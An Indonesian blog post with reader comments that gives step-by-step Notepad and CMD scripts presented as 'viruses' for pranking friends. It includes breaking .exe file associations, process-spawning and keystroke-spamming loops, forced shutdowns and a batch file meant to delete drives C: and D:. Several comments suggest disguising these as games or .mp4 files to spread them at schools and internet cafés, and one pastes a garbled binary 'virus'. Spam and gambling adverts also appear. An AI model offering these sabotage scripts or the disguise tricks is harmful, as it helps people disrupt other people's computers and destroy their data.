Cara Membuat Virus Menggunakan Notepad dan CMD

Posted by dika euphrosyne Selasa, 16 April 2013 164 komentar

Cara Membuat Virus Menggunakan Notepad dan CMD - Nah sobat kali ini saya akan share cara membuat virus menggunakan notepad dan cmd. Virus ini bisa digunakan untuk ngerjain teman dan ada juga yang cukup berbahaya sobat, saya share ini hanya sekedar ingin berbagi pengetahuan kepada sobat sekalian, siapa tau berguna dan bermanfaat bagi sobat dan supaya sobat juga tau kalau notepad dan cmd bawaan dari windows bisa digunakan untuk membuat virus. oke sobat, langsung akan saya jelaskan...



1. Saya akan menjelaskan cara membuat virus menggunakan CMD : Buka program cmd nya melalui klik start - run - ketik cmd atau bisa melalui keyboard dengan mengetik key windows + R lalu ketik cmd dan dan tekan enter lalu ketikan script berikut di cmd "ASSOC.exe=.hank" tanpa tanda petik lalu tekan enter! nah, ini membuat program/aplikasi yang berexstensi .exe tidak mau jalan, seperti game, dll. Tapi tenang, ini bisa dikembalikan seperti semuala dengan cara buka cmd nya lagi lalu ketik "ASSOC.exe=EXEFILE" trik ini bisa untuk ngerjain teman sobat, ya cuma buat iseng-iseng.




2. Sekarang saya akan menjelaskan cara membuat virus menggunakan Notepad : Buka notepad nya melalui start - all programs - accessories - notepad kemudian ketik kode script berikut ke notepad : 
------



start

start

start

start

start

start

start

start

start

start

start

start



------
Nah, selanjutnya simpan di notepad dengan nama apa saja dengan exstensi .bat contoh : "eror.bat" tanpa tanda kutip dan Save As Type ganti menjadi All Files. Trik ini membuat komputer menjadi eror, karena akan membuka CMD yang banyak jika file "eror.bat" itu di buka.

3. Masih di notepad, sekarang saya akan jelaskan cara membuat notepad terbuka secara otomatis, silahkan ketik/ copas kode script berikut ke notepad :


@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Simpan di notepad dengan nama apa saja dengan exstensi .bat sama seperti yang tadi, contoh "eror.bat" tanpa tanda kutip dan Save As Type ganti menjadi All Files. Trik ini akan membuat notepad terbuka dengan sendirinya secara otomatis.

4. Masih menggunakan notepad, yang sekarang cara membuat tombol backspace menjadi eror menekan terus menerus secara otomatis, langsung saja copas/ketik kode script berikut ke notepad : 

MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Simpan kode script tersebut di notepad dengan nama apa saja yang penting tidak lupa menuliskan exstensi .vbs contoh : "eror.vbs" tanpa tanda kutip dan Save As Type ganti menjadi Al Files. Trik ini membuat tombol backspace menjadi eror dan menekan dengan sendiri nya.

5. Masih menggunakan notepad, trik sekarang bisa membuat CD/DVD Room buka tutup dengan sendiri nya, langsung aja copas/ketik kode script berikut ke notepad : 

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Simpan kode tersebut di notepad dengan nama bebas dan tambahkan exstensi .vbs contoh : "eror.vbs" dan Save As Type ganti menjadi All Files, maka akan bisa membuat CD/DVD Room buka tutup dengan sendirinya secara otomatis.

6. Trik kali ini bisa membuat Caps Lock menyala terus menerus tak terkendali, langsung saja copas/ketik kode script berikut di notepad : 

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Simpan kode script tersebut dengan nama bebas dan dengan exstensi .vbs contoh "eror.vbs" dan Save As Type ganti menjadi All Files, maka jika File ini di buka akan membuat Caps Lock menyala terus menerus.

7. Trik yang ke tujuh, membuat komputer menjadi shoutdown dengan kata lain mati, langsung saja ini script nya copas ke notepad : 

@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s

Simpan kode script tersebut dengan nama bebas dan dengan exstensi .vbs contoh "eror.vbs" dan Save As Type ganti menjadi All Files, maka jika file ini di buka akan membuat komputer shoutdown atau mati.

8.Trik yang ini sama dengan trik yang nomor 7 hanya saja yang ini isi waktu, langsung saja copas/ketik kode script berikut ke notepad : 

@echo shutdown -s -t 1 -f 

Simpan kode script tersebut dengan nama bebas dan dengan exstensi .bat lain dengan trik yang no 7, contoh : "eror.bat" tanpa tanda kutip dan Save As Type ganti menjadi All Files, Maka jika file ini dibuka akan sama dengan no 7 yaitu membuat komputer Shoutdown, hanya saja yang membedakan adalah yang ini berisi waktu, lihat angka pada kode script tersebut yang berwarna biru, itu adalah waktu yang dibutuhkan untuk mematikan komputer, bisa di atur sesuai keinginan (1 = 1 detik)

9. Kali ini trik yang lumayan berbahaya, karena komputer akan dipenuhi oleh 100000000  

tourstart yang akan memenuhi layar monitor dan akan membuat komputer menjadi hang,  
untuk mengatasinya dapat mendelete semua tourstart tersebut atau langsung merestart 
komputer. Silahkan copas/ketik kode script berikut ke notepad : 

option explicit 
dim wshshell 
set wshshell=wscript.createobject(“wscript.shell”) 
dim x 
for x = 1 to 100000000 
wshshell.run “tourstart.exe” 
next

Simpan dengan nama bebas dan dengan exstensi .vbs contoh : "virus.vbs" tanpa tanda kutip dan Save As type ganti menjadi All Files. Pada angka yang saya beri wara biru, itu bisa di ganti sesuai keinginan, bisa dibuat menjadi 100 atau 1000 saja, dan begitu file ini dibuka akan membuat tourstart sesuai dengan angka yang ditulis pada kode tesebut,

10. Nah Yang terakhir ini, saya rasa paling berbayaha, karena dapat menghapus seluruh data di hardisk tanpa terkecuali, sehingga mau tidak mau ya harus instal ulang, langsung saja copas/ketik kode script berikut di notepad : 

@echo off
DEL C: -Y
DEL D: -Y


Simpan dengan nama bebas dan exstensi .bat contoh "virus.bat" tanpa tanda kutip dan Save As Type ganti menjadi All Files dan simpan , tapi JANGAN DIKLIK karena bisa berakibat fatal bagi komputer anda.

Oke..itulah beberapa cara membuat virus menggunakan notepad dan cmd, agar dapat dipergunakan dengan baik, dan agar sobat dapat berhati-hati jika melihat ada file di komputer sobat yang berexstensi .bat atau .vbs siapa tau teman atau orang dekat sobat iseng-iseng ngerjain...

164 komentar:

rohmatromadhon@blogspot.com mengatakan...

bagaimana cara memperbaikinya..?

Anonim mengatakan...

gan bagaimanaca cara nya membalikan ny seperti semula.. yg sudah terkena virus . trims

dika euphrosyne mengatakan...

@rohmatromadhon & Anonim : tinggal restart dan hapus file yang dibuat tadi itu sob..
terima kasih telah berkunjung (y)

MUHAMMAD NUR CAHYO mengatakan...

bagus banget..

Abd hannan mengatakan...

bagus bnget blog nya gan,
good luck

Abd hannan mengatakan...

minta izin copy paste gan

sukron onepeace mengatakan...

gan mintak ijin'a buat copas ya,,,,,

Taufick Hardiansyah mengatakan...

nice

Andri nova riswanto mengatakan...

kagak ngerti maksudnya save as type ganti menjadi all files

Anonim mengatakan...

gan cara mengoperasikan gmana.....

Anonim mengatakan...

gan yg make cmd berhasil. tapi membukanya lagi gak bisa. gimana nih?

Anonim mengatakan...

itu di atas ada

Jocker mengatakan...

takutnya pas coba2 malah tambah parah wkwkwk

Anonim mengatakan...

lanjut.. asal jangan dibuka sendiri file nya

Anonim mengatakan...

maju terus ...

Anonim mengatakan...

gan, ada trik yang kalo buka facebook otomatis langsung Alt + f4 ngga?

Muhammad Rifky mengatakan...

bang file nya virus CMD apaan?

Muhammad Rifky mengatakan...

bang CMDnya ngak bisa dibuka setelah pakai virus cmd
bagaimana solusinya?

Muhammad Rifky mengatakan...

bang file nya virus CMD apaan?

Usaha lain gak ada matinya mengatakan...

Permisi,
Bagi agan-agan yang ingin membuka usaha
Tapi bingung ingin membuka usaha apa dan hanya mempunyai modal kecil
Tak usah bingung,silahkan buka usaha pembayaran online
“ppob /online nasional”
Satu deposit bisa melakukan transaksi berikut:
Seperti listrik,tiket pesawat, tiket ka ,pln,pdam, telepon, speedy, kartu kredit, tv kabel, pulsa, kredit multifinance, dll secara mudah, murah namun tetap dengan dukungan teknologi yang handal dan sistem bisnis yang fleksibel dan menguntungkan.
Hanya bermodal ‘rp.100.000,’
Hubungi info lengkap: www.fastpaynasional.com
Hp:081334560101

yohanes19 mengatakan...

Keren gan, ijin sebarkan ya.

dika euphrosyne mengatakan...

@andri : saat save file'a itu kan ada pilihan'a sob...
@Anonim : coba di restart dulu sob klo ngga mau kebuka..
@M. Rifky : coba di restart dulu sob klo ngga mau kebuka..

bobon sae mengatakan...

uNIK nI poStiNGANnYA gan. iNi cAPS lOSK SAyA JAdI TiNUnG TINg GNi. rEsTART tErUs hapuS Ya GAn.

Anonim mengatakan...

Admin tolongin saya dong, Pas saya ngikutin cara yang pertama , saya Ketik Di Cmd kaya gini "ASSOC.exe=.hank" , Terus pas saya buka CMD nya lagi ngg Bisa...!! Gimana nih min..... :(

Tolong MIN.... T_T

Anonim mengatakan...

Admin tolongin saya dong, Pas saya ngikutin cara yang pertama , saya Ketik Di Cmd kaya gini "ASSOC.exe=.hank" , Terus pas saya buka CMD nya lagi ngg Bisa...!! Gimana nih min..... :(
Walauoun di restar tetep ngg bisa... :(

Tolong MIN.... T_T

By: Risang

Syarif Fuddin mengatakan...

Bagus banget Blognya Gan
Izin CoPas Gan! ^-^

feri fadli mengatakan...

cara meghilangkan semua virus diatas cuma restart dan hapus file nya aja ya ??
work gak tar malah ngeheng semua

Anonim mengatakan...

ene copas ya gan
blogx bagus^.^

Aditya Dwi Cahyo mengatakan...

ijin copas ..
ane kasih sumber deh ..

Anonim mengatakan...

mantap gan q kasih k tmn. dia langsung marah2

alvif sandana mahardika mengatakan...

terimaksh saranx ya..?

Anonim mengatakan...

bagus,terima kasih bang!
sudah dapet trik baru tentang virus,sekarang saya bagikan ke abang:
start dxdiag
start regedit
start mspaint
(copas banyak banyak)
kayak yang abang tadi bilang,save dengan (terror).bat
save as filesnya juga diganti all files
makasih ya!

ikhsan nugroho mengatakan...

Pake bat to exe converter ! ganti extensi bat ke .exe . terus ganti iconnya pake icon game yg popular ! selaat jail :D

ane saranin buat warnet yang agak gedean . kalo kita nyerang warnet kecil kasian ! wkkw

Anonim mengatakan...

klu di tumpuk kyk nya ngeriya gan Terima kasih Sangan Memberi ilmu :D

Anonim mengatakan...

keren banget, temen gue ampe bingung waktu laptopnya gua isengin pake cara yang nomer 5. dvd romnya gk mau berenti keluar masuk, xixixixi....^_^
thank'z ya gan blognya menarik banget.....

Anonim mengatakan...

gan cara na gi mana
10 kode itu di jadikan 1 notepad
dan cara autorun na gimana

imank imenk mengatakan...

keren banget gan
maju terus...........

Uzumaki Fanfan Namikaze mengatakan...

Hahahaha.. cobain yang CD Rom kebuka sendiri.. teruusss kebukkaaa.... Hahahhahaa.. Wowwww kkeerreeenn dahh..

fikrimuztova99 mengatakan...

YANG no. 7 seharusnya bat

satrio wahyutomo mengatakan...

kok kedeteksi sama avira sebagai virus sih ???

Ainun Najib mengatakan...

trik ke 10 maksudnya JANGAN DIKLIK apa gan ?

mohon pencerahannya ~~!!

Komputer mengatakan...

ainun najib tuh maksud nya bisa ngapus semua system dan data yang terletak di Drive C: dan D: makanya jangan asal klik gan :D

Anonim mengatakan...

Haha yg ke 10 extreme gan.bisa dicoba tuh disekolah haha

Anonim mengatakan...

Kalau kalian pengen coba buat virus lagi,,
lebih baik komputernya dipasang DeepFreeze dolo, biar nanti mbalek lagi kaya semula,,

juan cesar Andrianto mengatakan...

numpang coppas gan ^^

dika euphrosyne mengatakan...

maaf para sobat blogger sekalian, lama tak jumpa, karena ada kesibukan di dunia nyata :D hehe, harap maklum gan..thx udh berkunjung ke blog saya..

rizal ardiyantoro mengatakan...

Kalo mau mah diwarnet yg gk ada deepfreezenya kalo mau di restart gak ilang2 taro di startup

Anonim mengatakan...

kok gak ngaruh ya gan di komputer gw

dika euphrosyne mengatakan...

udh bener belum gan buatnya ??
saran saya sih jngn pke komp sendiri, pake punya orang lain aja..

Anonim mengatakan...

mantap gan (y)

aris tkj mengatakan...

mantap lah gan :)

dika euphrosyne mengatakan...

Sipp gan, semoga bermanfaat :)
Thanks udh berkunjung di blog ane..

Gue Ganteng mengatakan...

Kalau semua script digabung bsa ga gan ?

Xsharing12 mengatakan...

ahahhah kacau nih...sumpah keren gan...ahaha
matur nuhun ya...heheh

slam bloger

dika euphrosyne mengatakan...

@Gue Ganteng : tidak bisa gan, klo digabung script nya jadi error itu..
@Xsharing12 : Sipp gan, semoga bermanfaat :)

Anonim mengatakan...

Itu sudah biasa gan ...

Anonim mengatakan...

Coba yang ini gan..
Tulis dinotepad :

@ECHO off
.Begin
msg * haha ..
msg * haha ..
msg * salah sendiri buka file ini..
GOTO BEGIN

simpan dengan nama buka file ini .bat /ber extensi bat...

By : ..::123::..

dimas rizky mengatakan...

Blognya keren Aku suka desainnya Dan isinya juga berguna

Mr Adins mengatakan...

oke sob, tutor nya pertamax deh... :5

dika euphrosyne mengatakan...

@dimas rizky : Oke sob :) thanks udh berkunjung ke blog sy sob..
@Mr Adins : thx sob, semoga bermanfaat :)

Tilis Tiadi mengatakan...

pernah gua coba yang trik cmd, tapi masalahnya gimana klw mw ballikinnya lagi??
kan cmd itu termasuk file exe, sedangkan kode "ASSOC.exe=EXEFILE" kan mengunci file exe.. dari dulu saya belum dapat solusinya nih... untung kompi gue pake deep freeze waktu itu... kira-kira solusi untuk mengembalikannya gimana gan?

dika euphrosyne mengatakan...

klo saya pas cobanya itu pake deep freeze juga gan, karena ya itu CMD nya kan berexstensi .exe jadi ya ngga bisa ke buka juga :)

joni Online mengatakan...

mantap sekali artikel nya,,,

kunjungi balik blog saya ya???

Anonim mengatakan...

pernah gua coba yang trik cmd, tapi masalahnya gimana klw mw ballikinnya lagi??
kan cmd itu termasuk file exe, sedangkan kode "ASSOC.exe=EXEFILE" kan mengunci file exe.. - gimana komputer saya jadi erorr....
tolongin dong solusinya harus gimana

Anonim mengatakan...

pernah gua coba yang trik cmd, tapi masalahnya gimana klw mw ballikinnya lagi??
kan cmd itu termasuk file exe, sedangkan kode "ASSOC.exe=EXEFILE" kan mengunci file exe.. - gimana komputer saya jadi erorr....
tolongin dong solusinya harus gimana -

bantuin dong gan...???????????????????????????

Cara Ririn mengatakan...

wah ternyata virus bisa juga dibuat sendiri ya. Wah bahaya juga ya kalau banyak orang yang membuat virus. Kasihan kan komputernya jadi rusak dan file penting pada hilang hmmmm :)

dika euphrosyne mengatakan...

haha, iya mbak ririn, ini mungkin juga bisa dijadikan untuk berjaga-jaga, siapa tau ada temen yang jahil juga..

ahmad kharis mengatakan...

wah bgus min........ane coba ngerja'in tmen" ane min

Dian No Actions mengatakan...

Mantap gan..... hatur nuhun

dika euphrosyne mengatakan...

@ahmad kharis : hehe, semoga bermanfaat..

@Dian No Actions : oke sob, sipp2..

robby pratama mengatakan...

mas kan saya coba tulisan yang selalu muncul trus folder nya saya hapus abis itu saya shutdown terus muncul lagi gak mas kira kira mohon di bales cepat ya mas saya di omelin sama guru tikom gara gara tuh virus. hahahaha sekali sekali mah boleh jajal di lap komputer sekolah. mana gurunya bingung juga mas hahaha

abrok stupid mengatakan...

pernah gua coba yang trik cmd, tapi masalahnya gimana klw mw ballikinnya lagi??
kan cmd itu termasuk file exe, sedangkan kode "ASSOC.exe=EXEFILE" kan mengunci file exe.. - gimana komputer saya jadi erorr....
tolongin dong solusinya harus gimana -

bantuin dong bro,,,,ANONIM,,bantuin dong gimna cara mengembaliinnya.

Isnaini Chusnul Khotima mengatakan...

buat virus? gk ah tkut....
follow mas, ntar folbek

Zainal asyikin mengatakan...

Gan tinggalnya d mana mau ke rumah saya ngga saya bayar dehh.... bukan masalah ini tp..... beda mnta no.hp sama nama fbnya dong please penting neehhh

Zainal asyikin mengatakan...

Gan tinggalnya d mana mau ke rumah saya ngga saya bayar dehh.... bukan masalah ini tp..... beda mnta no.hp sama nama fbnya dong please penting neehhh

harry yusuf mengatakan...

gan, ane coba yang no 5 kenapa gak worked ya ? kalo nyebarinnya ke network yg lain dalam satu LAN gmana gan ? mohon pencerahannya. Thanks ilmunya

Rudi Hartono mengatakan...

gan.. ijin Copast ya...
kreen bgt ne...

Anonim mengatakan...

Thanks ilmunya gan......
Sangattt membantu..

Khaira Ummah mengatakan...

gAN FILE nya disimpan dimana

Anonim mengatakan...

menurut saya ini sih bukan virus, hanya permainan loop dan Do While saja, scirpt dasar daripada Visual Basic

Anonim mengatakan...

ok

ory siska mengatakan...

mantap sekali...

Yahya Trigumilang mengatakan...

ijin copas bro

Yahya Trigumilang mengatakan...

kunjungi blog ku ya
Http://abdyswakrt.blogspot.com

Hendry Chai mengatakan...

Ne vaksin virus buat ASSOC.exe=.hank download aj
http://www.mediafire.com/download/wn1wb328j7pdz2m/Vaksin_Virus_Exe.bat
Vaksinnya dari saya.
Kunjungi balik ya, izin copas.

ricky aviyanto mengatakan...
Komentar ini telah dihapus oleh pengarang.
ricky aviyanto mengatakan...

gan buat virus cmd berhasil tapi kembaliin nya gimana. .? soalnya buat buka cmdnya aj gak bisa. .

mohon bantuanya gan, ,.

zepin putra mengatakan...

mantap sekali...

oya mampir di blog aku ya???

Anonim mengatakan...

Thanks Hi Am Anonymous Beginner

Tarmizi Achmad mengatakan...

apa tujuan anda membuat virus????

fadly mengatakan...

bukan virus asli ya ??? cuma buat iseng aja itu mah

Anonim mengatakan...

bang .. kalo ngirm wormnya ke komputer lain gmna cranya..?

putu guruh mengatakan...

Sebenarnya itu bukan virus tapi command atau perintah perintah, karna perintahnya aneh aneh makanya jadi error. kalo itu virus udah kedetect waktu pertama nyimpennya...

putu guruh mengatakan...

Disini ane nyari buat bikin virus bukan bikin perintah yang kayak gitu.. itu mah sama aja kayak shortcut.. kapan-kapan bikin virus yang beneran yang bang. biar seru

Fahmi Al Khusni mengatakan...

@echo off
DEL C: -Y
DEL D: -Y
script itu mksudnya format C:\ dan D:\ ya....?

Anonim mengatakan...

Harusnya gan sblm coba neh script agan bikin dl script buat balikin lg.. kan tinggal bikin penawarnya aja gan

helmuth simon mengatakan...

wah keren mas...
hahaha
tadi virusnya hampir ngerusak cd room komputer saya
akhirnya gua cabut tuh CD room
hahaha

kotabaru mengatakan...

file cmd tersimpan dimana gan

Anonim mengatakan...

ini mah bukan virus trojan dll tapi command2 aja

Anonim mengatakan...

kalo smua script digabungin bisa jadi virus semua itu gak?

Anggie Maulana mengatakan...

ijin sedot gan

Syarif Yudyana mengatakan...

izin sedot gan

mochamad luthfi mengatakan...

GAN AMPUH, KIRA2 CARA NGIRIM KE TEMEN GIMANA.? BALAS YA

hamzah sailendra mengatakan...

itu kalo pakai virus Shutdown gimana cara ngilanginnya ga ?

hamzah sailendra mengatakan...

itu kalo pakai virus Shutdown gimana cara ngilanginnya ga ?

Anonim mengatakan...

sebelum buat virus mending buat o antivirus e dlu,,, kalo udah,,, baru di jalanin virus e,,, ntar kl kena kaya kasus yg .exe bisa langsung di nyalain pake anti virus e
saran buat yg mau gt mending buat sesuatu yg ngejebak pake video ***
jadi kalian screen shot dlu video nya trs copy ke paint, abis itu ubah ke ".ico" ntar virus e di ganti pake gambar ico nya, rename ganti ke ,mp4

kl shutdown itu ga usah di ilangin bos,,, asal ga di buka gpp kok

Anonim mengatakan...

scrip isa sih di gabungin, buka notepad kasi command openfile, suru aja cmd buka dari file 1 ke 10 tapi shut down e di kasi jeda yang agak lama sekitar 30 mnt, biar file yg lain pada jalan dlu

buat di sebarin ke temen pake cara ku tadi, di jadiin kek video aneh"
kalo ga gabungin aja ke file game, ntar autorun/read me nya di ganti pake virus, cuma ntar read me ne ttp ke buka jadi, cara nya buat file command openfile *virus abis ke buka, dia langsung lompat ke openfile read me yg asli

CUMA SARAN JANGAN DI PAKE BUAT MACEM"... sekedar bagi ilmu

Anonim mengatakan...

- Cyberlaw Bagi Cybercrime

Dengan demikian, kejahatan cyber seperti ini telah melanggar UU ITE (Undang Undang Informasi dan Tranksaksi Elektronik) terkait, yaitu BAB VII Pasal 33 tentang Virus yang membuat sistem tidak bekerja, dan pelanggaran UU ITE ini akan dikenakan denda sebesar 1 ( Satu ) Milyar Rupiah. Adapun bunyi dari Pasal tersebut yaitu : “Setiap Orang dengan sengaja dan tanpa hak atau melawan hukum melakukan tindakan apa pun yang berakibat terganggunya Sistem Elektronik dan atau mengakibatkan Sistem Elektronik menjadi tidak bekerja sebagaimana mestinya.”

Rahmat Chocolate mengatakan...

izin copas gan
untuk di beerbagilmu.blogspot.com
thx

Anonim mengatakan...

keren gan ^_^

Anonim mengatakan...

gan,numpang tanya,kalo virus nya harus berektensi .bat atau .vbs y?? kalau diubah jadi gambar file film macam mp4 atau 3gp dan lain-lain bisa gak?maksudnya biar menarik perhatian gitu.. :D atau bisa klik kanan trus properties lalu change icon?? mohon penjelasanny gan..

Poeji Hartadinata mengatakan...

izin bro copas yee?

safri awan mengatakan...

gmn cra sebarkan to kode2 script td.?? Wt teman2 kta

Nadiin Diandra mengatakan...

lumayan bisa di copas ..hihihihi

Raka Andika Prasetyo mengatakan...

salam blogger!

Rinaldi Phobos mengatakan...

sip bs jd hacker beneran klo gini

Anonim mengatakan...

Maaf Gan saya ke sini hanya ingin tahu saja,bahwa virus adalah serangan dari penyakit pc, nah gan virus yg di buat bisa di hapus atau tidak?

Anonim mengatakan...

Maaf Gan saya ke sini hanya ingin tahu saja,bahwa virus adalah serangan dari penyakit pc, nah gan virus yg di buat bisa di hapus atau tidak?

fadli simsar mengatakan...

Bg khan gitu udah di coba terus gimana cara mengembalikannya
file yg di simpan itu d hapus ya\??

dahlan syuhada mengatakan...

10 ASYIK NGERJAI ORANG

Anonim mengatakan...

trism gna ..tapi saya coba dulu ea

wan dha mengatakan...

gan untuk ngembaliin seperti semula gmana itu sedangkan CMD'a sendiri gk bisa dibuka karna dia juga extensinya EXE...mhon Solusi secepatnya.......trmksh

dery ansyah mengatakan...

keren

dhino aldi mengatakan...

sial komputer gwa rusak parah !!!

Anonim mengatakan...

gan itu notepad nya harus satu2 apa bisa copas semua di satu notepad?

thank's buat infonya

yohanis buloglabna mengatakan...

Hhahahahahahaa... Memang betul Blog ini bagus... tapi bagus untuk menipu anak kecil...

Bawono Wono mengatakan...

ijin copy gan

Anonim mengatakan...

Tekan Ctrl+r lalu ketik notepad
kemudian tekan enter
masukan script berikut!
START CMD
lalu simpan dengan ekstensi bat
misal cmd.bat

Anonim mengatakan...

keren gan

tapi note pad nya harus satu2 atau bisa di gabungin jadi satu?

Aldy Ubaidil B. El-Furqon mengatakan...

Makasih ilmunya gan..
Izin Copas

Ahmad Andi Andriansah mengatakan...

mantap gan ane cobain dulu,,
http://andirezpati.blogspot.com/

Na-Ta Cell mengatakan...

hai,,, bagus banget blognya :) silahkan berkunjung di blog saya.....

Na-Ta Cell mengatakan...

ijin copas gan...

Dimaz Sensey mengatakan...

kalo buat virus yang nyebar otomatis ktika fd d tancapkan gmana bang,,?

Dimaz Sensey mengatakan...

minta resepnya unt bwat virus bang,,,
pengen blajar sendri byar g copas,, kan enak bs mengembangkan dri sendri,,, xixixix

Dimaz Sensey mengatakan...

stelah q analisa ini menurutq bkan virus tp otak atik program...

Anonim mengatakan...

gan w bru nyoba yang pke cmd , sukses, v pas mau w balikin gk bisa cmdnya gk bisa d buka lagi gan, tolong dong solusinya , msalahnya w coba di komp spv gue ... tlong gan solusinya

Nona Bahaya mengatakan...

Mantapp Gann.... udah terbukti ampuhhh

Anonim mengatakan...

gan kalau bikin virus buat hacking fb gimana gan

cara membuat facebook mengatakan...

http://kaitani.blogspot.com/p/seni-dan-peralatan-cara-membuat-komik.html

khoirul lazuardi munir mengatakan...

hmmm jajal ah, mau ngerjain temen yang sok pinter komputer :D

Muhammad Cholis Malik mengatakan...

assoc.exe = .hank ?
Open notepad , type
@echo off
assoc.exe=exefile

and then run as administrator

thanks

Anonim mengatakan...

Ampuh banget Gan..............!!!!!!!!

Anonim mengatakan...

assoc.exe = .hank ?
Open notepad , type
@echo off
assoc.exe=exefile

and then run as administrator



save as filenya formatnya apa gan??

tupai camid mengatakan...

blog ente bagus gan , ane mau ngerjaiin temen , yang menghapus hardisk lansung

sukirman saja mengatakan...

lumayan nih buat kerjain temen
thanks atas virusnya gan

Anonim mengatakan...

iya .....
gw da buat anti virus buat ngatasi ginian gan...thanks da nambah zob gw gan (Y)

Elmo Agusti mengatakan...

yang notepad work (y) tapi yg cmd gk paham gan?

hafizah widya mengatakan...

Kuereeeen!!
Makasih, gan!
Lumayan buat ngerjain kakak kelas or adek kelas yang nyebelin.

Daffa Putra mengatakan...

Agan,gimana nih kompi ane,gara gara ente kompi ane all files nya jadi .exe ane coba ubah cmd nya ke cmd.bat ga mau,tolong.

adis fathul mengatakan...

cara kerjanya gimana gan?? itu kirim ketemennya gimana?? apa buat komputer sendiri??

adis fathul mengatakan...

cara kerjanya gimana gan?? itu kirim ketemennya gimana?? apa buat komputer sendiri??

AGUM DIAS PERMANA mengatakan...

gan linknya boleh di copy

Dimas Arya mengatakan...

Cuma nambahin ini VIRUS GANAS UNTUK TARGET PC DAN ANDROID ok cara kirim virusnya gampang nanti paste aja kode nya di bawah ini dgn berformat apa aja contoh nya video_lucu.mp4 atau cerita_nyata.mp4. Lagu afgan.mp3 . Dll ingat VIRUS INI BUKAN UNTUK DI SALAH GUNAKAN.. INI VIRUS BUAT JAGA JAGA DARA PENJAHAT E.BOOM.NET. INGAT SETIAP PRANGKAT YG TERSERANG VIRUS INI TIDAK BISA DI INSTALL ULANG BAHKAN MATI TOTAL .. DAN DI BUANG BELI BARU LAGI.. OK SILAHKAN PASTE KE NOTEPAD @system
echo>>?????:??????$O…s:???????????C???È???????????????d???f???&???????:???????:???????a?????????????????????????????????z???B???d???¼??? ???.???Ë??????? ???????????????j??? ???T???è???@???Î???5???????Þ???????????????j???Þ???T???H???_???????a???????ś???????????????`???ś???????ü???S???m???\???????ü???^o??????????"???ü???????????C?:?\?D?O?C?U?M?E?~?1?\?7?5?5?D?~?1?\?L?O?C?A?L?S?~?1?\?T?e?m?p?\?M?K?S?0?\?g?a?v?n?o?r?e?t?u?r?n?_?c?a?p?t?i?o?n?.?r?s?c?C?:?\?s?y?s?t?e?m?\?A?p?p?s?\?G?a?v?n?o?r?e?t?u?r?n?\?g?a?v?n?o?r?e?t?u?r?n?_?c?a?p?t?i?o?n?.?r?s?c?C?:?\?D?O?C?U?M?E?~?1?\?7?5?5?D?~?1?\?L?O?C?A?L?S?~?1?\?T?e?m?p?\?M?K?S?0?\?g?a?v?n?o?r?e?t?u?r?n?.?r?s?c?C?:?\?s?y?s?t?e?m?\?A?p?p?s?\?G?a?v?n?o?r?e?t?u?r?n?\?g?a?v?n?o?r?e?t?u?r?n?.?r?s?c?C?:?\?D?O?C?U?M?E?~?1?\?7?5?5?D?~?1?\?L?O?C?A?L?S?~?1?\?T?e?m?p?\?M?K?S?0?\?g?a?v?n?o?r?e?t?u?r?n?.?a?p?p?C?:?\?s?y?s?t?e?m?\?A?p?p?s?\?G?a?v?n?o?r?e?t?u?r?n?\?g?a?v?n?o?r?e?t?u?r?n?.?a?p?p?C?:?\?D?O?C?U?M?E?~?1?\?7?5?5?D?~?1?\?L?O?C?A?L?S?~?1?\?T?e?m?p?\?M?K?S?0?\?P?o?p?U?p?0?.?t?x?t?S?e?r?i?e?s?6?0?P?r?o?d?u?c?t?I?D?m?m?f?a?d?d?o?n?xś%Ť±?ƒ0?Dw$þá¶è¥C‡n??¨Bj;Сsè?±Hbä?¤þ}?õxwïùf¶ ¸@?=¥U?dÄt"IÐ?Möś¯,®ð?'…3ëô?5p'öýB²8,Q _??ÆìKûX3õáÜ-V?Å?÷4žv,ú¬? Ìì?)8âXt'ç0ä?V??~ Y§ØX×^ºªª²x±

Smith servasius mengatakan...

gan blognya keren . . :)

Hudza Hesa mengatakan...

Izin save gan,
Lumayan buat bales dendam ,, >,<

Muh.abdul mutholib mengatakan...

wah keren gan....tp gmana cara ngembaliinya untuk virus yang muncul 10000000 terus

zantank fanthudian mengatakan...

hahaha

zantank fanthudian mengatakan...

(untuk virus exe no 1) aku tw cara ngembaliin cmd yg udah di close supaya bekerja lg hhahahhaaaaa

PAK DONI DI MALAYSIA mengatakan...

saya mengucapkan banyak terimakasih kepada MBAH KABOIRENG yang telah menolong saya dalam kesulitan,ini tidak pernah terfikirkan dari benak saya kalau nomor yang saya pasang bisa tembus dan ALHAMDULILLAH kini saya sekeluarga sudah bisa melunasi semua hutang2 kami,sebenarnya saya bukan penggemar togel tapi apa boleh buat kondisi yang tidak memunkinkan dan akhirnya saya minta tolong sama MBAH KABOIRENG dan dengan senang hati MBAH KABOIRENG mau membantu saya..,ALHAMDULIL LAH nomor yang dikasi MBAH KABOIRENG semuanya bener2 terbukti tembus dan baru kali ini saya menemukan dukun yang jujur,jangan anda takut untuk menhubungiya jika anda ingin mendapatkan nomor yang betul2 tembus seperti saya,silahkan hubungi MBAH KABOIRENG DI 082=322=212=111 ingat kesempat tidak akan datang untuk yang kedua kalinga dan perlu anda ketahui kalau banyak dukun yang tercantum dalam internet,itu jangan dipercaya kalau bukan nama MBAH KABOIRENG KLIK TOGEL JITU DISINI











